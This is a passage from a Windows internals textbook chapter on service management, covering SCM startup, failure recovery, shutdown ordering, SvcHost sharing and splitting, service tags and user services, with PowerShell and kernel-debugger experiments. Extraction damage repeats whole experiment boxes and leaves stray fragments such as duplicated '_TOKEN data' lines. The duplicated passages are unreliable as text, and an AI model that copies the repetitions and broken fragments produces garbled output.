that the service failed to start (note that in this case the SCM terminates the process, unlike when the
service doesn’t respond to the start request, discussed previously in the “Service start” section). If
ServicesPipeTimeout doesn’t exist, the SCM uses a default timeout of 30 seconds. The SCM uses the
same timeout value for all its service communications.
Delayed autostart services
Delayed autostart services enable Windows to cope with the growing number of services that are
being started when a user logs on, which bogs down the boot-up process and increases the time
before a user is able to get responsiveness from the desktop. The design of autostart services was
primarily intended for services required early in the boot process because other services depend on
them, a good example being the RPC service, on which all other services depend. The other use was to
allow unattended startup of a service, such as the Windows Update service. Because many autostart
458
CHAPTER 10 Management, diagnostics, and tracing
services fall in this second category, marking them as delayed autostart allows critical services to start
faster and for the user’s desktop to be ready sooner when a user logs on immediately after booting.
Additionally, these services run in background mode, which lowers their thread, I/O, and memory
priority. Configuring a service for delayed autostart requires calling the ChangeServiceConfig2 API. You
can check the state of the flag for a service by using the qc option of sc.exe.
Note If a nondelayed autostart service has a delayed autostart service as one of its
dependencies, the delayed autostart flag is ignored and the service is started immediately
to satisfy the dependency.
Triggered-start services
Some services need to be started on demand, after certain system events occur. For that reason,
Windows 7 introduced the concept of triggered-start service. A service control program can use the
ChangeServiceConfig2 API (by specifying the SERVICE_CONFIG_TRIGGER_INFO information level) for
configuring a demand-start service to be started (or stopped) after one or more system events occur.
Examples of system events include the following:
I
A specific device interface is connected to the system.
I
The computer joins or leaves a domain.
I
A TCP/IP port is opened or closed in the system firewall.
I
A machine or user policy has been changed.
I
An IP address on the network TCP/IP stack becomes available or unavailable.
I
A RPC request or Named pipe packet arrives on a particular interface.
I
An ETW event has been generated in the system.
The first implementation of triggered-start services relied on the Unified Background Process
Manager (see the next section for details). Windows 8.1 introduced the Broker Infrastructure, which had
the main goal of managing multiple system events targeted to Modern apps. All the previously listed
events have been thus begun to be managed by mainly three brokers, which are all parts of the Broker
Infrastructure (with the exception of the Event Aggregation): Desktop Activity Broker, System Event
Broker, and the Event Aggregation. More information on the Broker Infrastructure is available in the
“Packaged applications” section of Chapter 8.
After the first phase of ScAutoStartServices is complete (which usually starts critical services listed
in the HKLM\SYSTEM\CurrentControlSet\Control\EarlyStartServices registry value), the SCM calls
ScRegisterServicesForTriggerAction, the function responsible in registering the triggers for each trig-
gered-start service. The routine cycles between each Win32 service located in the SCM database. For
each service, the function generates a temporary WNF state name (using the NtCreateWnfStateName
CHAPTER 10 Management, diagnostics, and tracing
459
native API), protected by a proper security descriptor, and publishes it with the service status stored as
state data. (WNF architecture is described in the “Windows Notification Facility” section of Chapter 8.)
This WNF state name is used for publishing services status changes. The routine then queries all the
service triggers from the TriggerInfo registry key, checking their validity and bailing out in case no trig-
gers are available.
Note The list of supported triggers, described previously, together with their parameters,
is documented at https://docs.microsoft.com/en-us/windows/win32/api/winsvc/ns-winsvc-
service_trigger.
If the check succeeded, for each trigger the SCM builds an internal data structure containing all the
trigger information (like the targeted service name, SID, broker name, and trigger parameters) and
determines the correct broker based on the trigger type: external devices events are managed by the
System Events broker, while all the other types of events are managed by the Desktop Activity broker.
The SCM at this stage is able to call the proper broker registration routine. The registration process is
private and depends on the broker: multiple private WNF state names (which are broker specific) are
generated for each trigger and condition.
The Event Aggregation broker is the glue between the private WNF state names published by the
two brokers and the Service Control Manager. It subscribes to all the WNF state names corresponding
to the triggers and the conditions (by using the RtlSubscribeWnfStateChangeNotification API). When
enough WNF state names have been signaled, the Event Aggregation calls back the SCM, which can
start or stop the triggered start service.
Differently from the WNF state names used for each trigger, the SCM always independently publishes
a WNF state name for each Win32 service whether or not the service has registered some triggers. This
is because an SCP can receive notification when the specified service status changes by invoking the
NotifyServiceStatusChange API, which subscribes to the service’s status WNF state name. Every time the
SCM raises an event that changes the status of a service, it publishes new state data to the “service status
change” WNF state, which wakes up a thread running the status change callback function in the SCP.
Startup errors
If a driver or a service reports an error in response to the SCM’s startup command, the ErrorControl
value of the service’s registry key determines how the SCM reacts. If the ErrorControl value is SERVICE_
ERROR_IGNORE (0) or the ErrorControl value isn’t specified, the SCM simply ignores the error and
continues processing service startups. If the ErrorControl value is SERVICE_ERROR_NORMAL (1), the
SCM writes an event to the system Event Log that says, “The <service name> service failed to start due
to the following error.” The SCM includes the textual representation of the Windows error code that the
service returned to the SCM as the reason for the startup failure in the Event Log record. Figure 10-18
shows the Event Log entry that reports a service startup error.
460
CHAPTER 10 Management, diagnostics, and tracing
FIGURE 10-18 Service startup failure Event Log entry.
If a service with an ErrorControl value of SERVICE_ERROR_SEVERE (2) or SERVICE_ERROR_CRITICAL
(3) reports a startup error, the SCM logs a record to the Event Log and then calls the internal function
ScRevertToLastKnownGood. This function checks whether the last known good feature is enabled, and,
if so, switches the system’s registry configuration to a version, named last known good, with which the
system last booted successfully. Then it restarts the system using the NtShutdownSystem system ser-
vice, which is implemented in the executive. If the system is already booting with the last known good
configuration, or if the last known good configuration is not enabled, the SCM does nothing more than
emit a log event.
Accepting the boot and last known good
Besides starting services, the system charges the SCM with determining when the system’s registry
configuration, HKLM\SYSTEM\CurrentControlSet, should be saved as the last known good control
set. The CurrentControlSet key contains the Services key as a subkey, so CurrentControlSet includes the
registry representation of the SCM database. It also contains the Control key, which stores many kernel-
mode and user-mode subsystem configuration settings. By default, a successful boot consists of a suc-
cessful startup of autostart services and a successful user logon. A boot fails if the system halts because
a device driver crashes the system during the boot or if an autostart service with an ErrorControl value
of SERVICE_ERROR_SEVERE or SERVICE_ERROR_CRITICAL reports a startup error.
The last known good configuration feature is usually disabled in the client version of Windows.
It can be enabled by setting the HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\
Configuration Manager\LastKnownGood\Enabled registry value to 1. In Server SKUs of Windows, the
value is enabled by default.
The SCM knows when it has completed a successful startup of the autostart services, but Winlogon
(%SystemRoot%\System32\Winlogon.exe) must notify it when there is a successful logon. Winlogon
invokes the NotifyBootConfigStatus function when a user logs on, and NotifyBootConfigStatus sends a
CHAPTER 10 Management, diagnostics, and tracing
461
message to the SCM. Following the successful start of the autostart services or the receipt of the mes-
sage from NotifyBootConfigStatus (whichever comes last), if the last known good feature is enabled, the
SCM calls the system function NtInitializeRegistry to save the current registry startup configuration.
Third-party software developers can supersede Winlogon’s definition of a successful logon
with their own definition. For example, a system running Microsoft SQL Server might not consider
a boot successful until after SQL Server is able to accept and process transactions. Developers im-
pose their definition of a successful boot by writing a boot-verification program and installing the
program by pointing to its location on disk with the value stored in the registry key HKLM\SYSTEM\
CurrentControlSet\Control\BootVerificationProgram. In addition, a boot-verification program’s instal-
lation must disable Winlogon’s call to NotifyBootConfigStatus by setting HKLM\SOFTWARE\Microsoft\
Windows NT\CurrentVersion\Winlogon\ReportBootOk to 0. When a boot-verification program is
installed, the SCM launches it after finishing autostart services and waits for the program’s call to
NotifyBootConfigStatus before saving the last known good control set.
Windows maintains several copies of CurrentControlSet, and CurrentControlSet is really a symbolic
registry link that points to one of the copies. The control sets have names in the form HKLM\SYSTEM\
ControlSetnnn, where nnn is a number such as 001 or 002. The HKLM\SYSTEM\Select key contains values
that identify the role of each control set. For example, if CurrentControlSet points to ControlSet001, the
Current value under Select has a value of 1. The LastKnownGood value under Select contains the number
of the last known good control set, which is the control set last used to boot successfully. Another value
that might be on your system under the Select key is Failed, which points to the last control set for which
the boot was deemed unsuccessful and aborted in favor of an attempt at booting with the last known
good control set. Figure 10-19 displays a Windows Server system’s control sets and Select values.
NtInitializeRegistry takes the contents of the last known good control set and synchronizes it with
that of the CurrentControlSet key’s tree. If this was the system’s first successful boot, the last known
good won’t exist, and the system will create a new control set for it. If the last known good tree exists,
the system simply updates it with differences between it and CurrentControlSet.
FIGURE 10-19 Control set selection key on Windows Server 2019.
462
CHAPTER 10 Management, diagnostics, and tracing
Last known good is helpful in situations in which a change to CurrentControlSet, such as the modifi-
cation of a system performance-tuning value under HKLM\SYSTEM\Control or the addition of a service
or device driver, causes the subsequent boot to fail. Figure 10-20 shows the Startup Settings of the
modern boot menu. Indeed, when the Last Known Good feature is enabled, and the system is in the
boot process, users can select the Startup Settings choice in the Troubleshoot section of the modern
boot menu (or in the Windows Recovery Environment) to bring up another menu that lets them direct
the boot to use the last known good control set. (In case the system is still using the Legacy boot
menu, users should press F8 to enable the Advanced Boot Options.) As shown in the figure, when the
Enable Last Known Good Configuration option is selected, the system boots by rolling the system’s
registry configuration back to the way it was the last time the system booted successfully. Chapter 12
describes in more detail the use of the Modern boot menu, the Windows Recovery Environment, and
other recovery mechanisms for troubleshooting system startup problems.
FIGURE 10-20 Enabling the last known good configuration.
Service failures
A service can have optional FailureActions and FailureCommand values in its registry key that the SCM
records during the service’s startup. The SCM registers with the system so that the system signals the
SCM when a service process exits. When a service process terminates unexpectedly, the SCM deter-
mines which services ran in the process and takes the recovery steps specified by their failure-related
registry values. Additionally, services are not only limited to requesting failure actions during crashes
or unexpected service termination, since other problems, such as a memory leak, could also result in
service failure.
CHAPTER 10 Management, diagnostics, and tracing
463
If a service enters the SERVICE_STOPPED state and the error code returned to the SCM is not
ERROR_SUCCESS, the SCM checks whether the service has the FailureActionsOnNonCrashFailures flag
set and performs the same recovery as if the service had crashed. To use this functionality, the service
must be configured via the ChangeServiceConfig2 API or the system administrator can use the Sc.exe
utility with the Failureflag parameter to set FailureActionsOnNonCrashFailures to 1. The default value
being 0, the SCM will continue to honor the same behavior as on earlier versions of Windows for all
other services.
Actions that a service can configure for the SCM include restarting the service, running a program,
and rebooting the computer. Furthermore, a service can specify the failure actions that take place the
first time the service process fails, the second time, and subsequent times, and it can indicate a delay
period that the SCM waits before restarting the service if the service asks to be restarted. You can easily
manage the recovery actions for a service using the Recovery tab of the service’s Properties dialog
box in the Services MMC snap-in, as shown in Figure 10-21.
FIGURE 10-21 Service Recovery options.
Note that in case the next failure action is to reboot the computer, the SCM, after starting the ser-
vice, marks the hosting process as critical by invoking the NtSetInformationProcess native API with the
ProcessBreakOnTermination information class. A critical process, if terminated unexpectedly, crashes
the system with the CRITICAL_PROCESS_DIED bugcheck (as already explained in Part 1, Chapter 2,
“System architecture.”
464
CHAPTER 10 Management, diagnostics, and tracing
Service shutdown
When Winlogon calls the Windows ExitWindowsEx function, ExitWindowsEx sends a message to
Csrss, the Windows subsystem process, to invoke Csrss’s shutdown routine. Csrss loops through the
active processes and notifies them that the system is shutting down. For every system process except
the SCM, Csrss waits up to the number of seconds specified in milliseconds by HKCU\Control Panel\
Desktop\WaitToKillTimeout (which defaults to 5 seconds) for the process to exit before moving on to the
next process. When Csrss encounters the SCM process, it also notifies it that the system is shutting down
but employs a timeout specific to the SCM. Csrss recognizes the SCM using the process ID Csrss saved
when the SCM registered with Csrss using the RegisterServicesProcess function during its initialization.
The SCM’s timeout differs from that of other processes because Csrss knows that the SCM communi-
cates with services that need to perform cleanup when they shut down, so an administrator might need
to tune only the SCM’s timeout. The SCM’s timeout value in milliseconds resides in the HKLM\SYSTEM\
CurrentControlSet\Control\WaitToKillServiceTimeout registry value, and it defaults to 20 seconds.
The SCM’s shutdown handler is responsible for sending shutdown notifications to all the ser-
vices that requested shutdown notification when they initialized with the SCM. The SCM function
ScShutdownAllServices first queries the value of the HKLM\SYSTEM\CurrentControlSet\Control\
ShutdownTimeout (by setting a default of 20 seconds in case the value does not exists). It then loops
through the SCM services database. For each service, it unregisters eventual service triggers and deter-
mines whether the service desires to receive a shutdown notification, sending a shutdown command
(SERVICE_CONTROL_SHUTDOWN) if that is the case. Note that all the notifications are sent to services
in parallel by using thread pool work threads. For each service to which it sends a shutdown command,
the SCM records the value of the service’s wait hint, a value that a service also specifies when it registers
with the SCM. The SCM keeps track of the largest wait hint it receives (in case the maximum calculated
wait hint is below the Shutdown timeout specified by the ShutdownTimeout registry value, the shutdown
timeout is considered as maximum wait hint). After sending the shutdown messages, the SCM waits either
until all the services it notified of shutdown exit or until the time specified by the largest wait hint passes.
While the SCM is busy telling services to shut down and waiting for them to exit, Csrss waits
for the SCM to exit. If the wait hint expires without all services exiting, the SCM exits, and Csrss
continues the shutdown process. In case Csrss’s wait ends without the SCM having exited (the
WaitToKillServiceTimeout time expired), Csrss kills the SCM and continues the shutdown process. Thus,
services that fail to shut down in a timely manner are killed. This logic lets the system shut down with
the presence of services that never complete a shutdown as a result of flawed design, but it also means
that services that require more than 5 seconds will not complete their shutdown operations.
Additionally, because the shutdown order is not deterministic, services that might depend on other
services to shut down first (called shutdown dependencies) have no way to report this to the SCM and
might never have the chance to clean up either.
To address these needs, Windows implements preshutdown notifications and shutdown ordering
to combat the problems caused by these two scenarios. A preshutdown notification is sent to a service
that has requested it via the SetServiceStatus API (through the SERVICE_ACCEPT_PRESHUTDOWN ac-
cepted control) using the same mechanism as shutdown notifications. Preshutdown notifications are
sent before Wininit exits. The SCM generally waits for them to be acknowledged.
CHAPTER 10 Management, diagnostics, and tracing
465
The idea behind these notifications is to flag services that might take a long time to clean up (such as
database server services) and give them more time to complete their work. The SCM sends a progress
query request and waits 10 seconds for a service to respond to this notification. If the service does not
respond within this time, it is killed during the shutdown procedure; otherwise, it can keep running as
long as it needs, as long as it continues to respond to the SCM.
Services that participate in the preshutdown can also specify a shutdown order with respect to
other preshutdown services. Services that depend on other services to shut down first (for example,
the Group Policy service needs to wait for Windows Update to finish) can specify their shutdown de-
pendencies in the HKLM\SYSTEM\CurrentControlSet\Control\PreshutdownOrder registry value.
Shared service processes
Running every service in its own process instead of having services share a process whenever possible
wastes system resources. However, sharing processes means that if any of the services in the process
has a bug that causes the process to exit, all the services in that process terminate.
Of the Windows built-in services, some run in their own process and some share a process with
other services. For example, the LSASS process contains security-related services—such as the Security
Accounts Manager (SamSs) service, the Net Logon (Netlogon) service, the Encrypting File System (EFS)
service, and the Crypto Next Generation (CNG) Key Isolation (KeyIso) service.
There is also a generic process named Service Host (SvcHost - %SystemRoot%\System32\Svchost.
exe) to contain multiple services. Multiple instances of SvcHost run as different processes. Services
that run in SvcHost processes include Telephony (TapiSrv), Remote Procedure Call (RpcSs), and Remote
Access Connection Manager (RasMan). Windows implements services that run in SvcHost as DLLs and
includes an ImagePath definition of the form %SystemRoot%\System32\svchost.exe –k netsvcs in the
service’s registry key. The service’s registry key must also have a registry value named ServiceDll under
a Parameters subkey that points to the service’s DLL file.
All services that share a common SvcHost process specify the same parameter (–k netsvcs in the ex-
ample in the preceding paragraph) so that they have a single entry in the SCM’s image database. When
the SCM encounters the first service that has a SvcHost ImagePath with a particular parameter during
service startup, it creates a new image database entry and launches a SvcHost process with the param-
eter. The parameter specified with the -k switch is the name of the service group. The entire command
line is parsed by the SCM while creating the new shared hosting process. As discussed in the “Service
logon” section, in case another service in the database shares the same ImagePath value, its service SID
will be added to the new hosting process’s group SIDs list.
The new SvcHost process takes the service group specified in the command line and looks for a val-
ue having the same name under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost.
SvcHost reads the contents of the value, interpreting it as a list of service names, and notifies the SCM
that it’s hosting those services when SvcHost registers with the SCM.
When the SCM encounters another shared service (by checking the service type value) during
service startup with an ImagePath matching an entry it already has in the image database, it doesn’t
launch a second process but instead just sends a start command for the service to the SvcHost it
466
CHAPTER 10 Management, diagnostics, and tracing
already started for that ImagePath value. The existing SvcHost process reads the ServiceDll parameter
in the service’s registry key, enables the new service group SID in its token, and loads the DLL into its
process to start the service.
Table 10-12 lists all the default service groupings on Windows and some of the services that are
registered for each of them.
TABLE 10-12 Major service groupings
Service Group
Services
Notes
LocalService
Network Store Interface, Windows
Diagnostic Host, Windows Time,
COM+ Event System, HTTP Auto-
Proxy Service, Software Protection
Platform UI Notification, Thread Order
Service, LLDT Discovery, SSL, FDP
Host, WebClient
Services that run in the local service
account and make use of the network
on various ports or have no network
usage at all (and hence no restric-
tions).
LocalServiceAndNoImpersonation
UPnP and SSDP, Smart Card, TPM,
Font Cache, Function Discovery,
AppID, qWAVE, Windows Connect
Now, Media Center Extender,
Adaptive Brightness
Services that run in the local service
account and make use of the network
on a fixed set of ports. Services run
with a write-restricted token.
LocalServiceNetworkRestricted
DHCP, Event Logger, Windows Audio,
NetBIOS, Security Center, Parental
Controls, HomeGroup Provider
Services that run in the local service
account and make use of the network
on a fixed set of ports.
LocalServiceNoNetwork
Diagnostic Policy Engine, Base
Filtering Engine, Performance Logging
and Alerts, Windows Firewall, WWAN
AutoConfig
Services that run in the local service
account but make no use of the net-
work at all. Services run with a write-
restricted token.
LocalSystemNetworkRestricted
DWM, WDI System Host, Network
Connections, Distributed Link
Tracking, Windows Audio Endpoint,
Wired/WLAN AutoConfig, Pnp-X, HID
Access, User-Mode Driver Framework
Service, Superfetch, Portable Device
Enumerator, HomeGroup Listener,
Tablet Input, Program Compatibility,
Offline Files
Services that run in the local system
account and make use of the network
on a fixed set of ports.
NetworkService
Cryptographic Services, DHCP Client,
Terminal Services, WorkStation,
Network Access Protection, NLA, DNS
Client, Telephony, Windows Event
Collector, WinRM
Services that run in the network
service account and make use of the
network on various ports (or have no
enforced network restrictions).
NetworkServiceAndNoImpersonation
KTM for DTC
Services that run in the network ser-
vice account and make use of the net-
work on a fixed set of ports. Services
run with a write-restricted token.
NetworkServiceNetworkRestricted
IPSec Policy Agent
Services that run in the network ser-
vice account and make use of the net-
work on a fixed set of ports.
CHAPTER 10 Management, diagnostics, and tracing
467
Svchost service splitting
As discussed in the previous section, running a service in a shared host process saves system resources
but has the big drawback that a single unhandled error in a service obliges all the other services shared
in the host process to be killed. To overcome this problem, Windows 10 Creators Update (RS2) has
introduced the Svchost Service splitting feature.
When the SCM starts, it reads three values from the registry representing the services global commit
limits (divided in: low, medium, and hard caps). These values are used by the SCM to send “low resources”
messages in case the system runs under low-memory conditions. It then reads the Svchost Service
split threshold value from the HKLM\SYSTEM\CurrentControlSet\Control\SvcHostSplitThresholdInKB
registry value. The value contains the minimum amount of system physical memory (expressed in KB)
needed to enable Svchost Service splitting (the default value is 3.5 GB on client systems and around
3.7 GB on server systems). The SCM then obtains the value of the total system physical memory using
the GlobalMemoryStatusEx API and compares it with the threshold previously read from the registry.
If the total physical memory is above the threshold, it enables Svchost service splitting (by setting an
internal global variable).
Svchost service splitting, when active, modifies the behavior in which SCM starts the host Svchost
process of shared services. As already discussed in the “Service start” section earlier in this chapter, the
SCM does not search for an existing image record in its database if service splitting is allowed for a ser-
vice. This means that, even though a service is marked as sharable, it is started using its private hosting
process (and its type is changed to SERVICE_WIN32_OWN_PROCESS). Service splitting is allowed only
if the following conditions apply:
I
Svchost Service splitting is globally enabled.
I
The service is not marked as critical. A service is marked as critical if its next recovery action
specifies to reboot the machine (as discussed previously in the “Service failures” section).
I
The service host process name is Svchost.exe.
I
Service splitting is not explicitly disabled for the service through the SvcHostSplitDisable registry
value in the service control key.
Memory manager’s technologies like Memory Compression and Combining help in saving as much
of the system working set as possible. This explains one of the motivations behind the enablement
of Svchost service splitting. Even though many new processes are created in the system, the memory
manager assures that all the physical pages of the hosting processes remain shared and consume as
little system resources as possible. Memory combining, compression, and memory sharing are ex-
plained in detail in Chapter 5 of Part 1.
468
CHAPTER 10 Management, diagnostics, and tracing
EXPERIMENT: Playing with Svchost service splitting
In case you are using a Windows 10 workstation equipped with 4 GB or more of memory, when you
open the Task Manager, you may notice that a lot of Svchost.exe process instances are currently
executing. As explained in this section, this doesn’t produce a memory waste problem, but you
could be interested in disabling Svchost splitting. First, open Task Manager and count how many
svchost process instances are currently running in the system. On a Windows 10 May 2019 Update
(19H1) system, you should have around 80 Svchost process instances. You can easily count them by
opening an administrative PowerShell window and typing the following command:
(get-process -Name "svchost" | measure).Count
On the sample system, the preceding command returned 85.
Open the Registry Editor (by typing regedit.exe in the Cortana search box) and navi-
gate to the HKLM\SYSTEM\CurrentControlSet\Control key. Note the current value of the
SvcHostSplitThresholdInKB DWORD value. To globally disable Svchost service splitting, you
should modify the registry value by setting its data to 0. (You change it by double-clicking the
registry value and entering 0.) After modifying the registry value, restart the system and repeat
the previous step: counting the number of Svchost process instances. The system now runs with
much fewer of them:
PS C:\> (get-process -Name "svchost" | measure).Count
26
To return to the previous behavior, you should restore the previous content of the
SvcHostSplitThresholdInKB registry value. By modifying the DWORD value, you can also fine-tune
the amount of physical memory needed by Svchost splitting for correctly being enabled.
Service tags
One of the disadvantages of using service-hosting processes is that accounting for CPU time and us-
age, as well as for the usage of resources by a specific service is much harder because each service is
sharing the memory address space, handle table, and per-process CPU accounting numbers with the
other services that are part of the same service group. Although there is always a thread inside the
service-hosting process that belongs to a certain service, this association might not always be easy to
make. For example, the service might be using worker threads to perform its operation, or perhaps the
start address and stack of the thread do not reveal the service’s DLL name, making it hard to figure out
what kind of work a thread might be doing and to which service it might belong.
Windows implements a service attribute called the service tag (not to be confused with the driver
tag), which the SCM generates by calling ScGenerateServiceTag when a service is created or when the
service database is generated during system boot. The attribute is simply an index identifying the ser-
vice. The service tag is stored in the SubProcessTag field of the thread environment block (TEB) of each
thread (see Chapter 3 of Part 1 for more information on the TEB) and is propagated across all threads
that a main service thread creates (except threads created indirectly by thread-pool APIs).
EXPERIMENT: Playing with Svchost service splitting
In case you are using a Windows 10 workstation equipped with 4 GB or more of memory, when you
open the Task Manager, you may notice that a lot of Svchost.exe process instances are currently
executing. As explained in this section, this doesn’t produce a memory waste problem, but you
could be interested in disabling Svchost splitting. First, open Task Manager and count how many
svchost process instances are currently running in the system. On a Windows 10 May 2019 Update
(19H1) system, you should have around 80 Svchost process instances. You can easily count them by
opening an administrative PowerShell window and typing the following command:
(get-process -Name "svchost" | measure).Count
On the sample system, the preceding command returned 85.
Open the Registry Editor (by typing regedit.exe in the Cortana search box) and navi-
gate to the HKLM\SYSTEM\CurrentControlSet\Control key. Note the current value of the
SvcHostSplitThresholdInKB DWORD value. To globally disable Svchost service splitting, you
should modify the registry value by setting its data to 0. (You change it by double-clicking the
registry value and entering 0.) After modifying the registry value, restart the system and repeat
the previous step: counting the number of Svchost process instances. The system now runs with
much fewer of them:
PS C:\> (get-process -Name "svchost" | measure).Count
26
To return to the previous behavior, you should restore the previous content of the
SvcHostSplitThresholdInKB registry value. By modifying the DWORD value, you can also fine-tune
the amount of physical memory needed by Svchost splitting for correctly being enabled.
CHAPTER 10 Management, diagnostics, and tracing
469
Although the service tag is kept internal to the SCM, several Windows utilities, like Netstat.exe
(a utility you can use for displaying which programs have opened which ports on the network), use
undocumented APIs to query service tags and map them to service names. Another tool you can use
to look at service tags is ScTagQuery from Winsider Seminars & Solutions Inc. (www.winsiderss.com/
tools/sctagquery/sctagquery.htm). It can query the SCM for the mappings of every service tag and
display them either systemwide or per-process. It can also show you to which services all the threads
inside a service-hosting process belong. (This is conditional on those threads having a proper service
tag associated with them.) This way, if you have a runaway service consuming lots of CPU time, you can
identify the culprit service in case the thread start address or stack does not have an obvious service
DLL associated with it.
User services
As discussed in the “Running services in alternate accounts” section, a service can be launched using
the account of a local system user. A service configured in that way is always loaded using the specified
user account, regardless of whether the user is currently logged on. This could represent a limitation
in multiuser environments, where a service should be executed with the access token of the currently
logged-on user. Furthermore, it can expose the user account at risk because malicious users can po-
tentially inject into the service process and use its token to access resources they are not supposed to
(being able also to authenticate on the network).
Available from Windows 10 Creators Update (RS2), User Services allow a service to run with the
token of the currently logged-on user. User services can be run in their own process or can share a
process with one or more other services running in the same logged-on user account as for standard
services. They are started when a user performs an interactive logon and stopped when the user logs
off. The SCM internally supports two additional type flags—SERVICE_USER_SERVICE (64) and SERVICE_
USERSERVICE_INSTANCE (128)—which identify a user service template and a user service instance.
One of the states of the Winlogon finite-state machine (see Chapter 12 for details on Winlogon
and the boot process) is executed when an interactive logon has been initiated. The state creates the
new user’s logon session, window station, desktop, and environment; maps the HKEY_CURRENT_USER
registry hive; and notifies the logon subscribers (LogonUI and User Manager). The User Manager
service (Usermgr.dll) through RPC is able to call into the SCM for delivering the WTS_SESSION_LOGON
session event.
The SCM processes the message through the ScCreateUserServicesForUser function, which calls
back into the User Manager for obtaining the currently logged-on user’s token. It then queries the list
of user template services from the SCM database and, for each of them, generates the new name of
the user instance service.
470
CHAPTER 10 Management, diagnostics, and tracing
EXPERIMENT: Witnessing user services
A kernel debugger can easily show the security attributes of a process’s token. In this experi-
ment, you need a Windows 10 machine with a kernel debugger enabled and attached to a host
(a local debugger works, too). In this experiment, you choose a user service instance and analyze
its hosting process’s token. Open the Services tool by typing its name in the Cortana search box.
The application shows standard services and also user services instances (even though it erro-
neously displays Local System as the user account), which can be easily identified because they
have a local unique ID (LUID, generated by the User Manager) attached to their displayed names.
In the example, the Connected Device User Service is displayed by the Services application as
Connected Device User Service_55d01:
If you double-click the identified service, the tool shows the actual name of the user service
instance (CDPUserSvc_55d01 in the example). If the service is hosted in a shared process, like the
one chosen in the example, you should use the Registry Editor to navigate in the service root key
of the user service template, which has the same name as the instance but without the LUID (the
user service template name is CDPUserSvc in the example). As explained in the “Viewing privi-
leges required by services” experiment, under the Parameters subkey, the Service DLL name is
stored. The DLL name should be used in Process Explorer for finding the correct hosting process
ID (or you can simply use Task Manager in the latest Windows 10 versions).
After you have found the PID of the hosting process, you should break into the kernel de-
bugger and type the following commands (by replacing the <ServicePid> with the PID of the
service’s hosting process):
!process <ServicePid> 1
EXPERIMENT: Witnessing user services
A kernel debugger can easily show the security attributes of a process’s token. In this experi-
ment, you need a Windows 10 machine with a kernel debugger enabled and attached to a host
(a local debugger works, too). In this experiment, you choose a user service instance and analyze
its hosting process’s token. Open the Services tool by typing its name in the Cortana search box.
The application shows standard services and also user services instances (even though it erro-
neously displays Local System as the user account), which can be easily identified because they
have a local unique ID (LUID, generated by the User Manager) attached to their displayed names.
In the example, the Connected Device User Service is displayed by the Services application as
Connected Device User Service_55d01:
If you double-click the identified service, the tool shows the actual name of the user service
instance (CDPUserSvc_55d01 in the example). If the service is hosted in a shared process, like the
one chosen in the example, you should use the Registry Editor to navigate in the service root key
of the user service template, which has the same name as the instance but without the LUID (the
user service template name is CDPUserSvc in the example). As explained in the “Viewing privi-
leges required by services” experiment, under the Parameters subkey, the Service DLL name is
stored. The DLL name should be used in Process Explorer for finding the correct hosting process
ID (or you can simply use Task Manager in the latest Windows 10 versions).
After you have found the PID of the hosting process, you should break into the kernel de-
bugger and type the following commands (by replacing the <ServicePid> with the PID of the
service’s hosting process):
!process <ServicePid> 1
CHAPTER 10 Management, diagnostics, and tracing
471
The debugger displays several pieces of information, including the address of the associated
security token object:
Kd: 0> !process 0n5936 1
Searching for Process with Cid == 1730
PROCESS ffffe10646205080
SessionId: 2 Cid: 1730 Peb: 81ebbd1000 ParentCid: 0344
DirBase: 8fe39002 ObjectTable: ffffa387c2826340 HandleCount: 313.
Image: svchost.exe
VadRoot ffffe1064629c340 Vads 108 Clone 0 Private 962. Modified 214. Locked 0.
DeviceMap ffffa387be1341a0
Token
ffffa387c2bdc060
ElapsedTime
00:35:29.441
...
<Output omitted for space reasons>
To show the security attributes of the token, you just need to use the !token command fol-
lowed by the address of the token object (which internally is represented with a _TOKEN data
structure) returned by the previous command. You should easily confirm that the process is
hosting a user service by seeing the WIN://ScmUserService security attribute, as shown in the
following output:
0: kd> !token ffffa387c2bdc060
_TOKEN 0xffffa387c2bdc060
TS Session ID: 0x2
User: S-1-5-21-725390342-1520761410-3673083892-1001
User Groups:
00 S-1-5-21-725390342-1520761410-3673083892-513
Attributes - Mandatory Default Enabled
... <Output omitted for space reason> ...
OriginatingLogonSession: 3e7
PackageSid: (null)
CapabilityCount: 0
Capabilities: 0x0000000000000000
LowboxNumberEntry: 0x0000000000000000
Security Attributes:
00 Claim Name
: WIN://SCMUserService
Claim Flags: 0x40 - UNKNOWN
Value Type
: CLAIM_SECURITY_ATTRIBUTE_TYPE_UINT64
Value Count: 1
Value[0] : 0
01 Claim Name
: TSA://ProcUnique
Claim Flags: 0x41 - UNKNOWN
Value Type
: CLAIM_SECURITY_ATTRIBUTE_TYPE_UINT64
Value Count: 2
Value[0] : 102
Value[1] : 352550
Process Hacker, a system tool similar to Process Explorer and available at https://processhacker.
sourceforge.io/ is able to extract the same information.
The debugger displays several pieces of information, including the address of the associated
security token object:
Kd: 0> !process 0n5936 1
Searching for Process with Cid == 1730
PROCESS ffffe10646205080
SessionId: 2 Cid: 1730 Peb: 81ebbd1000 ParentCid: 0344
DirBase: 8fe39002 ObjectTable: ffffa387c2826340 HandleCount: 313.
Image: svchost.exe
VadRoot ffffe1064629c340 Vads 108 Clone 0 Private 962. Modified 214. Locked 0.
DeviceMap ffffa387be1341a0
Token
ffffa387c2bdc060
ElapsedTime
00:35:29.441
...
<Output omitted for space reasons>
To show the security attributes of the token, you just need to use the !token command fol-
lowed by the address of the token object (which internally is represented with a _TOKEN data
_TOKEN data
_TOKEN
structure) returned by the previous command. You should easily confirm that the process is
hosting a user service by seeing the WIN://ScmUserService security attribute, as shown in the
following output:
0: kd> !token ffffa387c2bdc060
_TOKEN 0xffffa387c2bdc060
TS Session ID: 0x2
User: S-1-5-21-725390342-1520761410-3673083892-1001
User Groups:
00 S-1-5-21-725390342-1520761410-3673083892-513
Attributes - Mandatory Default Enabled
... <Output omitted for space reason> ...
OriginatingLogonSession: 3e7
PackageSid: (null)
CapabilityCount: 0
Capabilities: 0x0000000000000000
LowboxNumberEntry: 0x0000000000000000
Security Attributes:
00 Claim Name
: WIN://SCMUserService
Claim Flags: 0x40 - UNKNOWN
Value Type
: CLAIM_SECURITY_ATTRIBUTE_TYPE_UINT64
Value Count: 1
Value[0] : 0
01 Claim Name
: TSA://ProcUnique
Claim Flags: 0x41 - UNKNOWN
Value Type
: CLAIM_SECURITY_ATTRIBUTE_TYPE_UINT64
Value Count: 2
Value[0] : 102
Value[1] : 352550
Process Hacker, a system tool similar to Process Explorer and available at https://processhacker.
sourceforge.io/ is able to extract the same information.
sourceforge.io/ is able to extract the same information.
sourceforge.io/
472
